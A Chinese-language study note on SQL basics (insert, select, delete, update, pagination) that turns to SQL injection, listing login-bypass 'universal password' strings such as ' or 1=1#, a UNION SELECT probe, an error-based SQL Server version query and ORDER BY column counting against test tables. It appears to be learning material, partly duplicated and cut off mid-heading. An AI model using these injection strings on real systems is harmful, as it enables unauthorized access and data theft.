一、SQL语句基础知识
1.增删改查
增加:
insert into 表(列1,列2...)values(值1,值2....)
例如: insert into test.news VALUES(3,'test','test','3')
查询:
select 列1,列2 from 库.表(*代表全部列,limit分页(limit 起始下标,条数))
例如:SELECT * FROM test.news;
![]()
1.增删改查
增加:
insert into 表(列1,列2...)values(值1,值2....)
例如: insert into test.news VALUES(3,'test','test','3')
查询:
select 列1,列2 from 库.表(*代表全部列,limit分页(limit 起始下标,条数))
例如:SELECT * FROM test.news;
SELECT id,title FROM test.news;
SELECT id,title FROM test.news LIMIT 0,2
删除:
delete from 库.表 条件
DELETE FROM test.news WHERE id=3
更改:
update 库.表 set 列1=值,列2=值 条件
UPDATE test.news SET type='2' WHERE id=2;
SELECT * FROM test.news LIMIT 1,1;
万能密码
SELECT * FROM test.admin WHERE username ='' or 1=1#'AND PASSWORD ='test' #查询test库中admin表中的用户名和密码
SELECT * FROM mysql.`user` WHERE `User` ='' or 1=1#'AND PASSWORD ='test' #查询mysql库中的user表中的用户名和密码
SELECT * FROM test.admin WHERE username ='a' or 'a'='a' AND PASSWORD ='test' #根据密码查询用户名
SELECT * FROM test.admin WHERE `password`='a' or 'a'='a' AND username ='test' #根据用户名查密码
SELECT * FROM test.admin WHERE 1=1 AND (username = 'a') or 'a' ='a' AND (`password`='test') #在test库的admin表中查看密码为test的用户
SELECT * from test.admin where id = 7 and 2=1 UNION SELECT 1,2,3 #只查询test库中admin用户表中新增的表id=1的用户
SELECT * FROM mysql.`user` WHERE 1=1 #查询mysql表中user用户表
sql server 分页是用top
例如: select top 1 * from apptest..news -----select top 页数 * from 库..表名
sql server错误注入
例如: select top 1 * from apptest..news where id =1 and 1 (select @@version) ----查询sqlserver 版本号
oracle分页查询 rownum
注入(mysql):
UPDATE test.news SET type ='1' WHERE id=1 ORDER by id DESC #更改表中的列进行注入
SELECT * FROM test.admin WHERE id = 7 ORDER BY id DESC
SELECT * FROM test.admin where id=1 ORDER BY 3 DESC # 判断列的长度
2.条件语句
where ....